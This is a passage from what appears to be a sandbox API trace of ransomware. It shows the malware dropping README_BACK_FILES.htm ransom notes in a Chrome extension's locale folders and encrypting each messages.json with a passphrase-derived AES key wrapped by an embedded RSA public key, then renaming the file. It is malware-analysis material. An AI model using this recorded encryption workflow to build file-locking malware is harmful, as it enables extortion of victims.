hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.446] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.446] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\readme_back_files.htm")) returned 0xffffffff [0257.446] AreFileApisANSI () returned 1 [0257.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.446] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.447] GetFileType (hFile=0x5d50) returned 0x1 [0257.447] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.451] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.451] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.452] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.452] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.452] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.453] GetLastError () returned 0x0 [0257.453] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json")) returned 0x20 [0257.453] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0257.454] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.454] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.455] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.456] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.458] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.458] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.458] CryptHashData (hHash=0x2e18128, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.458] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.458] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.458] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.458] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e161e8) returned 1 [0257.459] CryptImportPublicKeyInfo (in: hCryptProv=0x2e161e8, dwCertEncodingType=0x1, pInfo=0x2e24260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24298*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ee8) returned 1 [0257.459] CryptEncrypt (in: hKey=0x2e19ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.459] CryptEncrypt (in: hKey=0x2e19ee8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e155b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e155b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.459] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e155b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e155b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.460] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0257.461] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0257.461] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0257.462] CloseHandle (hObject=0x5d5c) returned 1 [0257.462] CloseHandle (hObject=0x5d60) returned 1 [0257.462] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0257.465] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0257.466] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.gsg")) returned 1 [0257.467] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\messages.json.fuck")) returned 1 [0257.469] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.469] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.469] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.469] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.469] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.469] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0257.469] AreFileApisANSI () returned 1 [0257.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.469] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.470] GetFileType (hFile=0x5d50) returned 0x1 [0257.470] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.471] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.471] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.472] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.472] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.472] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.472] GetLastError () returned 0x0 [0257.472] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json")) returned 0x20 [0257.472] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json", dwFileAttributes=0x80) returned 1 [0257.473] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.473] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.475] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.476] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.478] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.478] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.478] CryptHashData (hHash=0x2e18128, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.478] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.478] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.478] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.478] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15638) returned 1 [0257.479] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15638, dwCertEncodingType=0x1, pInfo=0x2e25440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25478*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19f28) returned 1 [0257.479] CryptEncrypt (in: hKey=0x2e19f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.479] CryptEncrypt (in: hKey=0x2e19f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15b00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15b00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.479] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15b00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15b00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.480] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1c2, lpOverlapped=0x0) returned 1 [0257.482] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1c2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1d0) returned 1 [0257.482] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1d0, lpOverlapped=0x0) returned 1 [0257.482] CloseHandle (hObject=0x5d60) returned 1 [0257.483] CloseHandle (hObject=0x5d5c) returned 1 [0257.483] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json"), bFailIfExists=0) returned 1 [0257.489] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json", dwFileAttributes=0x0) returned 1 [0257.490] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.gsg")) returned 1 [0257.491] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\messages.json.fuck")) returned 1 [0257.492] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.492] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.492] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.492] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.492] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.492] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\readme_back_files.htm")) returned 0xffffffff [0257.492] AreFileApisANSI () returned 1 [0257.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.493] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.493] GetFileType (hFile=0x5d50) returned 0x1 [0257.493] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.495] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.495] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.497] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.497] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.497] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.497] GetLastError () returned 0x0 [0257.497] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json")) returned 0x20 [0257.497] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0257.498] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json" (normalized: 